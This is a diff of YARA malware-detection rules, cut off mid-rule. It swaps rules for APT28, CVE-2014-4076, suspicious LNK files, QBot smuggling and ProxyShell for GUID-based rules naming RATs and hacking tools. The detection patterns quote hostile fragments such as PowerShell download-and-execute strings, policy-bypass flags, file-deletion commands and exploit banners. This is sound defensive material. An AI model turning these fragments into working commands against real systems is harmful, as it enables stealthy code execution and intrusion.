-		reference = "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy.yar#L29-L51"
+		description = "Detects VB.NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "40ab8103-9151-5a5c-8b70-ab3bfd3896f9"
+		date = "2020-12-30"
+		modified = "2023-04-06"
+		reference = "https://github.com/graysuit/gray-keylogger-2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4333-L4349"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b1946af23fa0de69f5631a66fa211dab5d8731b5afdb23898428842232752e77"
+		logic_hash = "eb7cbfcc7d57298d3ce325596834e94f3594bafb0273e9f81715114b21af6371"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "335565711db93cd02d948f472c51598be4d62d60f70f25a20449c07eae36c8c5"
 
 	strings:
-		$x1 = "%appdata%\\nad.dll" fullword wide
-		$s3 = "%appdata%\\nad.bat" fullword wide
-		$s1 = "apds.dll" fullword ascii
-		$s2 = "nad.dll\"" fullword ascii
+		$typelibguid0lo = "e94ca3ff-c0e5-4d1a-ad5e-f6ebbe365067" ascii wide
+		$typelibguid0up = "E94CA3FF-C0E5-4D1A-AD5E-F6EBBE365067" ascii wide
+		$typelibguid1lo = "1ed07564-b411-4626-88e5-e1cd8ecd860a" ascii wide
+		$typelibguid1up = "1ED07564-B411-4626-88E5-E1CD8ECD860A" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "a2d1be6502b4b3c28959a4fb0196ea45" or pe.exports ( "VidBitRpl" ) or 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_APT_ATP28_Sofacy_Indicators_May19_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Lime_Miner : FILE
 {
 	meta:
-		description = "Detects APT28 Sofacy indicators in samples"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ca768b60-7094-537a-b848-28bd42555287"
-		date = "2019-05-18"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1129647994603790338"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy.yar#L53-L78"
+		description = "Detects VB.NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d0631817-10a2-55bf-a41d-226fa0dcb9f9"
+		date = "2020-12-30"
+		modified = "2023-04-06"
+		reference = "https://github.com/NYAN-x-CAT/Lime-Miner"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4351-L4365"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4e3530f540cc66e99b82bd88887943c8e524d4d750734058d9a7b27f76bc6871"
-		score = 60
+		logic_hash = "57d75144415518c24e2a24fa933e9e205513e16c2ec062b2a3c715a0fa6415db"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "80548416ffb3d156d3ad332718ed322ef54b8e7b2cc77a7c5457af57f51d987a"
-		hash2 = "b40909ac0b70b7bd82465dfc7761a6b4e0df55b894dd42290e3f72cb4280fa44"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "c:\\Users\\user\\Desktop\\openssl-1.0.1e_m\\/ssl/cert.pem" ascii
-		$x2 = "C:\\Users\\User\\Desktop\\Downloader_Poco" ascii
-		$s1 = "w%SystemRoot%\\System32\\npmproxy.dll" fullword wide
-		$op0 = { e8 41 37 f6 ff 48 2b e0 e8 99 ff ff ff 48 8b d0 }
-		$op1 = { e9 34 3c e3 ff cc cc cc cc 48 8d 8a 20 }
-		$op2 = { e8 af bb ef ff b8 ff ff ff ff e9 f4 01 00 00 8b }
+		$typelibguid0lo = "13958fb9-dfc1-4e2c-8a8d-a5e68abdbc66" ascii wide
+		$typelibguid0up = "13958FB9-DFC1-4E2C-8A8D-A5E68ABDBC66" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and ( pe.imphash ( ) == "f4e1c3aaec90d5dfa23c04da75ac9501" or 1 of ( $x* ) or ( $s1 and 2 of ( $op* ) ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_CVE_2014_4076_Exploitcode : CVE_2014_4076 FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Blacknet : FILE
 {
 	meta:
-		description = "Detects an exploit code for CVE-2014-4076"
-		author = "Florian Roth (Nextron Systems)"
-		id = "83563dea-63d9-58a9-82ed-275455122571"
-		date = "2018-04-04"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/yarGen"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2014_4076.yar#L2-L18"
+		description = "Detects VB.NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9fbb3c11-7b11-5910-9c8b-247aeefbaa87"
+		date = "2020-12-30"
+		modified = "2023-04-06"
+		reference = "https://github.com/BlackHacker511/BlackNET"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4367-L4387"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "96b8743de8b3968d64b74af93f5e61574a3b31d33df6d51e944b4f02c7b9723e"
+		logic_hash = "a64b8d7d73292675e86ff73a0548582af36a6ed3c37fec52a3d2e012c49b9aa8"
 		score = 75
 		quality = 85
-		tags = "CVE-2014-4076, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "44690af85efef2db04c7e8cba7ca0d0e53be1a1432a339570a7d26eec860b8ee"
 
 	strings:
-		$x1 = "[+] Created a new cmd.exe process" fullword ascii
-		$x2 = "[+] Modified shellcode" fullword ascii
-		$x3 = "[*] Spawning SYSTEM shell..." fullword ascii
-		$x4 = "[*] MS14-070 (CVE-2014-4076) x86" fullword ascii
+		$typelibguid0lo = "c2b90883-abee-4cfa-af66-dfd93ec617a5" ascii wide
+		$typelibguid0up = "C2B90883-ABEE-4CFA-AF66-DFD93EC617A5" ascii wide
+		$typelibguid1lo = "8bb6f5b4-e7c7-4554-afd1-48f368774837" ascii wide
+		$typelibguid1up = "8BB6F5B4-E7C7-4554-AFD1-48F368774837" ascii wide
+		$typelibguid2lo = "983ae28c-91c3-4072-8cdf-698b2ff7a967" ascii wide
+		$typelibguid2up = "983AE28C-91C3-4072-8CDF-698B2FF7A967" ascii wide
+		$typelibguid3lo = "9ac18cdc-3711-4719-9cfb-5b5f2d51fd5a" ascii wide
+		$typelibguid3up = "9AC18CDC-3711-4719-9CFB-5B5F2D51FD5A" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_LNK_Lnkfileoverrfc : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Plasmarat : FILE
 {
 	meta:
-		description = "Detects APT lnk files that run double extraction and launch routines with autoruns"
-		author = "@Grotezinfosec, modified by Florian Roth"
-		id = "19c393af-ff7c-5345-a3ef-c06372344baf"
-		date = "2018-09-18"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_lnk_files.yar#L2-L18"
+		description = "Detects VB.NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "13362cba-f9b2-50c8-95cc-504e585bdd42"
+		date = "2020-12-30"
+		modified = "2023-04-06"
+		reference = "https://github.com/mwsrc/PlasmaRAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4389-L4405"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "52ff949a17039c1fa5707ff503aa1a96b3925bdfef01867c9b59a8d72493a84e"
-		score = 65
+		logic_hash = "4474f0c9d76a6ec1dd754b0b9ba0bcedce3f82148ecddcdcc4d040220c407788"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$command = "C:\\Windows\\System32\\cmd.exe" fullword ascii
-		$command2 = {2F 00 63 00 20 00 66 00 69 00 6E 00 64 00 73 00 74 00 72}
-		$base64 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD" ascii
-		$cert = " -decode " ascii
+		$typelibguid0lo = "b8a2147c-074c-46e1-bb99-c8431a6546ce" ascii wide
+		$typelibguid0up = "B8A2147C-074C-46E1-BB99-C8431A6546CE" ascii wide
+		$typelibguid1lo = "0fcfde33-213f-4fb6-ac15-efb20393d4f3" ascii wide
+		$typelibguid1up = "0FCFDE33-213F-4FB6-AC15-EFB20393D4F3" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and filesize > 15KB and ( 2 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_LNK_Suspiciouscommands : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Lime_RAT : FILE
 {
 	meta:
-		description = "Detects LNK file with suspicious content"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8bfb1322-8e33-50bc-a389-2d8bdfec9ca7"
-		date = "2018-09-18"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_lnk_files.yar#L20-L51"
+		description = "Detects VB.NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "31a0e9ca-9da1-557a-bcc5-1351fa90a0e1"
+		date = "2020-12-30"
+		modified = "2023-04-06"
+		reference = "https://github.com/NYAN-x-CAT/Lime-RAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4407-L4461"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a0380927ebc89e46f9138e01f154113c5e23680cea9b117b47406003ea565c1e"
-		score = 60
-		quality = 81
+		logic_hash = "dfe208c2962c03c14ff21f5936f476ee75ebd5f1464d26e5da0e66d6e995716d"
+		score = 75
+		quality = 60
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = " -decode " ascii wide
-		$s2 = " -enc " ascii wide
-		$s3 = " -w hidden " ascii wide
-		$s4 = " -ep bypass " ascii wide
-		$s5 = " -noni " ascii nocase wide
-		$s7 = " -noprofile " ascii wide
-		$s8 = ".DownloadString(" ascii wide
-		$s9 = ".DownloadFile(" ascii wide
-		$s10 = "IEX(" ascii wide
-		$s11 = "iex(" ascii wide
-		$s12 = "WScript.shell" ascii wide fullword nocase
-		$s13 = " -nop " ascii wide
-		$s14 = "&tasklist>"
-		$s15 = "setlocal EnableExtensions DisableDelayedExpansion"
-		$s16 = "echo^ set^"
-		$s17 = "del /f /q "
-		$s18 = " echo | start "
-		$s19 = "&& echo "
-		$s20 = "&&set "
-		$s21 = "%&&@echo off "
+		$typelibguid0lo = "e58ac447-ab07-402a-9c96-95e284a76a8d" ascii wide
+		$typelibguid0up = "E58AC447-AB07-402A-9C96-95E284A76A8D" ascii wide
+		$typelibguid1lo = "8fb35dab-73cd-4163-8868-c4dbcbdf0c17" ascii wide
+		$typelibguid1up = "8FB35DAB-73CD-4163-8868-C4DBCBDF0C17" ascii wide
+		$typelibguid2lo = "37845f5b-35fe-4dce-bbec-2d07c7904fb0" ascii wide
+		$typelibguid2up = "37845F5B-35FE-4DCE-BBEC-2D07C7904FB0" ascii wide
+		$typelibguid3lo = "83c453cf-0d29-4690-b9dc-567f20e63894" ascii wide
+		$typelibguid3up = "83C453CF-0D29-4690-B9DC-567F20E63894" ascii wide
+		$typelibguid4lo = "8b1f0a69-a930-42e3-9c13-7de0d04a4add" ascii wide
+		$typelibguid4up = "8B1F0A69-A930-42E3-9C13-7DE0D04A4ADD" ascii wide
+		$typelibguid5lo = "eaaeccf6-75d2-4616-b045-36eea09c8b28" ascii wide
+		$typelibguid5up = "EAAECCF6-75D2-4616-B045-36EEA09C8B28" ascii wide
+		$typelibguid6lo = "5b2ec674-0aa4-4209-94df-b6c995ad59c4" ascii wide
+		$typelibguid6up = "5B2EC674-0AA4-4209-94DF-B6C995AD59C4" ascii wide
+		$typelibguid7lo = "e2cc7158-aee6-4463-95bf-fb5295e9e37a" ascii wide
+		$typelibguid7up = "E2CC7158-AEE6-4463-95BF-FB5295E9E37A" ascii wide
+		$typelibguid8lo = "d04ecf62-6da9-4308-804a-e789baa5cc38" ascii wide
+		$typelibguid8up = "D04ECF62-6DA9-4308-804A-E789BAA5CC38" ascii wide
+		$typelibguid9lo = "8026261f-ac68-4ccf-97b2-3b55b7d6684d" ascii wide
+		$typelibguid9up = "8026261F-AC68-4CCF-97B2-3B55B7D6684D" ascii wide
+		$typelibguid10lo = "212cdfac-51f1-4045-a5c0-6e638f89fce0" ascii wide
+		$typelibguid10up = "212CDFAC-51F1-4045-A5C0-6E638F89FCE0" ascii wide
+		$typelibguid11lo = "c1b608bb-7aed-488d-aa3b-0c96625d26c0" ascii wide
+		$typelibguid11up = "C1B608BB-7AED-488D-AA3B-0C96625D26C0" ascii wide
+		$typelibguid12lo = "4c84e7ec-f197-4321-8862-d5d18783e2fe" ascii wide
+		$typelibguid12up = "4C84E7EC-F197-4321-8862-D5D18783E2FE" ascii wide
+		$typelibguid13lo = "3fc17adb-67d4-4a8d-8770-ecfd815f73ee" ascii wide
+		$typelibguid13up = "3FC17ADB-67D4-4A8D-8770-ECFD815F73EE" ascii wide
+		$typelibguid14lo = "f1ab854b-6282-4bdf-8b8b-f2911a008948" ascii wide
+		$typelibguid14up = "F1AB854B-6282-4BDF-8B8B-F2911A008948" ascii wide
+		$typelibguid15lo = "aef6547e-3822-4f96-9708-bcf008129b2b" ascii wide
+		$typelibguid15up = "AEF6547E-3822-4F96-9708-BCF008129B2B" ascii wide
+		$typelibguid16lo = "a336f517-bca9-465f-8ff8-2756cfd0cad9" ascii wide
+		$typelibguid16up = "A336F517-BCA9-465F-8FF8-2756CFD0CAD9" ascii wide
+		$typelibguid17lo = "5de018bd-941d-4a5d-bed5-fbdd111aba76" ascii wide
+		$typelibguid17up = "5DE018BD-941D-4A5D-BED5-FBDD111ABA76" ascii wide
+		$typelibguid18lo = "bbfac1f9-cd4f-4c44-af94-1130168494d0" ascii wide
+		$typelibguid18up = "BBFAC1F9-CD4F-4C44-AF94-1130168494D0" ascii wide
+		$typelibguid19lo = "1c79cea1-ebf3-494c-90a8-51691df41b86" ascii wide
+		$typelibguid19up = "1C79CEA1-EBF3-494C-90A8-51691DF41B86" ascii wide
+		$typelibguid20lo = "927104e1-aa17-4167-817c-7673fe26d46e" ascii wide
+		$typelibguid20up = "927104E1-AA17-4167-817C-7673FE26D46E" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x004c and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_DOC_LNK_In_ZIP : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Njrat : FILE
 {
 	meta:
-		description = "Detects suspicious .doc.lnk file in ZIP archive"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9c140d02-3b18-5faf-bb1d-2eb5c07a23dc"
-		date = "2019-07-02"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/RedDrip7/status/1145877272945025029"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_lnk_files.yar#L53-L66"
+		description = "Detects VB.NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2140d69e-fb15-50a2-ba85-b7c8293003fb"
+		date = "2020-12-30"
+		modified = "2023-04-06"
+		reference = "https://github.com/mwsrc/njRAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4463-L4487"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ef4cdaad05af12f210aa6324a1e34a42843f814c59fb0085ac18370917ad4866"
-		score = 50
+		logic_hash = "739914bf21b1ac198e904b50986e28a50e53044696dafa777149f18f024beb5e"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "7ea4f77cac557044e72a8e280372a2abe072f2ad98b5a4fbed4e2229e780173a"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = ".doc.lnk" fullword ascii
+		$typelibguid0lo = "5a542c1b-2d36-4c31-b039-26a88d3967da" ascii wide
+		$typelibguid0up = "5A542C1B-2D36-4C31-B039-26A88D3967DA" ascii wide
+		$typelibguid1lo = "6b07082a-9256-42c3-999a-665e9de49f33" ascii wide
+		$typelibguid1up = "6B07082A-9256-42C3-999A-665E9DE49F33" ascii wide
+		$typelibguid2lo = "c0a9a70f-63e8-42ca-965d-73a1bc903e62" ascii wide
+		$typelibguid2up = "C0A9A70F-63E8-42CA-965D-73A1BC903E62" ascii wide
+		$typelibguid3lo = "70bd11de-7da1-4a89-b459-8daacc930c20" ascii wide
+		$typelibguid3up = "70BD11DE-7DA1-4A89-B459-8DAACC930C20" ascii wide
+		$typelibguid4lo = "fc790ee5-163a-40f9-a1e2-9863c290ff8b" ascii wide
+		$typelibguid4up = "FC790EE5-163A-40F9-A1E2-9863C290FF8B" ascii wide
+		$typelibguid5lo = "cb3c28b2-2a4f-4114-941c-ce929fec94d3" ascii wide
+		$typelibguid5up = "CB3C28B2-2A4F-4114-941C-CE929FEC94D3" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x4b50 and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_MAL_Qbot_HTML_Smuggling_Indicators_Oct22_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Manager : FILE
 {
 	meta:
-		description = "Detects double encoded PKZIP headers as seen in HTML files used by QBot"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8034d6af-4dae-5ff6-b635-efb5175fe4d1"
-		date = "2022-10-07"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/ankit_anubhav/status/1578257383133876225?s=20&t=Bu3CCJCzImpTGOQX_KGsdA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_qbot_payloads.yar#L2-L55"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "eef65d2c-ddbc-50c3-a6a0-e7032a55e92d"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/TheWover/Manager"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4489-L4505"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a5bd9eb72205f1398ec0b8773751309699b3267e0272dacf2728f8495c0c0ec2"
+		logic_hash = "cb6ef79b7430f0d7892c8c2819bc0d6f9493e0c74ca475b9f82b28a6b565dfb8"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		hash1 = "4f384bcba31fda53e504d0a6c85cee0ce3ea9586226633d063f34c53ddeaca3f"
-		hash2 = "8e61c2b751682becb4c0337f5a79b2da0f5f19c128b162ec8058104b894cae9b"
-		hash3 = "c5d23d991ce3fbcf73b177bc6136d26a501ded318ccf409ca16f7c664727755a"
-		hash4 = "5072d91ee0d162c28452123a4d9986f3df6b3244e48bf87444ce88add29dd8ed"
-		hash5 = "ff4e21f788c36aabe6ba870cf3b10e258c2ba6f28a2d359a25d5a684c92a0cad"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sd1 = "VUVzREJCUUFBUUFJQ"
-		$sd2 = "VFc0RCQlFBQVFBSU"
-		$sd3 = "VRXNEQkJRQUFRQUlB"
-		$sdr1 = "QJFUUBFUUCJERzVUV"
-		$sdr2 = "USBFVQBFlQCR0cFV"
-		$sdr3 = "BlUQRFUQRJkQENXRV"
-		$st1 = "VlVWelJFSkNVVUZCVVVGSl"
-		$st2 = "ZVVnpSRUpDVVVGQlVVRkpR"
-		$st3 = "WVVZ6UkVKQ1VVRkJVVUZKU"
-		$st4 = "VkZjMFJDUWxGQlFWRkJTV"
-		$st5 = "ZGYzBSQ1FsRkJRVkZCU1"
-		$st6 = "WRmMwUkNRbEZCUVZGQlNV"
-		$st7 = "VlJYTkVRa0pSUVVGUlFVbE"
-		$st8 = "ZSWE5FUWtKUlFVRlJRVWxC"
-		$st9 = "WUlhORVFrSlJRVUZSUVVsQ"
-		$str1 = "UUpGVVVCRlVVQ0pFUnpWVV"
-		$str2 = "FKRlVVQkZVVUNKRVJ6VlVW"
-		$str3 = "RSkZVVUJGVVVDSkVSelZVV"
-		$str4 = "VVNCRlZRQkZsUUNSMGNGV"
-		$str5 = "VTQkZWUUJGbFFDUjBjRl"
-		$str6 = "VU0JGVlFCRmxRQ1IwY0ZW"
-		$str7 = "QmxVUVJGVVFSSmtRRU5YUl"
-		$str8 = "JsVVFSRlVRUkprUUVOWFJW"
-		$str9 = "CbFVRUkZVUVJKa1FFTlhSV"
-		$htm = "<html" ascii
-		$eml = "Content-Transfer-Encoding:" ascii
+		$typelibguid0lo = "dda73ee9-0f41-4c09-9cad-8215abd60b33" ascii wide
+		$typelibguid0up = "DDA73EE9-0F41-4C09-9CAD-8215ABD60B33" ascii wide
+		$typelibguid1lo = "6a0f2422-d4d1-4b7e-84ad-56dc0fd2dfc5" ascii wide
+		$typelibguid1up = "6A0F2422-D4D1-4B7E-84AD-56DC0FD2DFC5" ascii wide
 
 	condition:
-		filesize < 10MB and ( ( 1 of ( $sd* ) and $htm and not $eml ) or ( 1 of ( $st* ) and $eml ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EXPL_Exchange_Proxyshell_Failed_Aug21_1 : SCRIPT
+rule SIGNATURE_BASE_HKTL_NET_GUID_Neo_Confuserex : FILE
 {
 	meta:
-		description = "Detects ProxyShell exploitation attempts in log files"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9b849042-8918-5322-a35a-2165d4b541d5"
-		date = "2021-08-08"
-		modified = "2021-08-09"
-		reference = "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L2-L16"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d73117a6-4512-5545-a4f4-72d8cf708340"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/XenocodeRCE/neo-ConfuserEx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4507-L4521"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "690e74633ac8671727fe47f6398e536c1b7a4ac469d27d3f7507c75e175716bd"
-		score = 50
-		quality = 60
-		tags = "SCRIPT"
+		logic_hash = "2394b2a7098b284b18bf9fcda6ca26b34ae0143f8bd146578cc9c2d68df0741c"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xr1 = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(powershell|mapi\/nspi|EWS\/|X-Rps-CAT)[^\n]{1,400}401 0 0/ nocase ascii
-		$xr3 = /Email=autodiscover\/autodiscover\.json[^\n]{1,400}401 0 0/ nocase ascii
+		$typelibguid0lo = "e98490bb-63e5-492d-b14e-304de928f81a" ascii wide
+		$typelibguid0up = "E98490BB-63E5-492D-B14E-304DE928F81A" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EXPL_Exchange_Proxyshell_Successful_Aug21_1 : SCRIPT
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpallowedtoact : FILE
 {
 	meta:
-		description = "Detects successful ProxyShell exploitation attempts in log files"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8c11cd1a-6d3f-5f29-af61-17179b01ca8b"
-		date = "2021-08-08"
-		modified = "2025-03-21"
-		reference = "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L18-L34"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "13b7f5e0-4d34-533d-a182-b3fe7c93ca43"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/pkb1s/SharpAllowedToAct"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4523-L4537"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "06ab609a8efe3b36b6356a9cf7b7b11b2fc2a556ec1df6995008a9df86b3fcee"
-		score = 65
-		quality = 83
-		tags = "SCRIPT"
+		logic_hash = "872f4d70f7cefff8c1fadbe61d858c898a259559889ca4951f5368589d28169d"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xr1a = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(powershell|X-Rps-CAT)/ nocase ascii
-		$xr1b = / \/autodiscover\/autodiscover\.json[^\n]{1,300}\/(mapi\/nspi|EWS\/)[^\n]{1,400}(200|302) 0 0/
-		$xr2 = /autodiscover\/autodiscover\.json[^\n]{1,60}&X-Rps-CAT=/ nocase ascii
-		$xr3 = /Email=autodiscover\/autodiscover\.json[^\n]{1,400}200 0 0/ nocase ascii
+		$typelibguid0lo = "dac5448a-4ad1-490a-846a-18e4e3e0cf9a" ascii wide
+		$typelibguid0up = "DAC5448A-4AD1-490A-846A-18E4E3E0CF9A" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Aug21_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Supersqlinjectionv1 : FILE
 {
 	meta:
-		description = "Detects webshells dropped by ProxyShell exploitation based on their file header (must be PST), size and content"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a351a466-695e-570e-8c7f-9c6c0534839c"
-		date = "2021-08-13"
-		modified = "2025-03-21"
-		reference = "https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-servers-are-getting-hacked-via-proxyshell-exploits/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L36-L49"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "247bef0d-7873-51c7-97b8-1be6dfe7708d"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/shack2/SuperSQLInjectionV1"
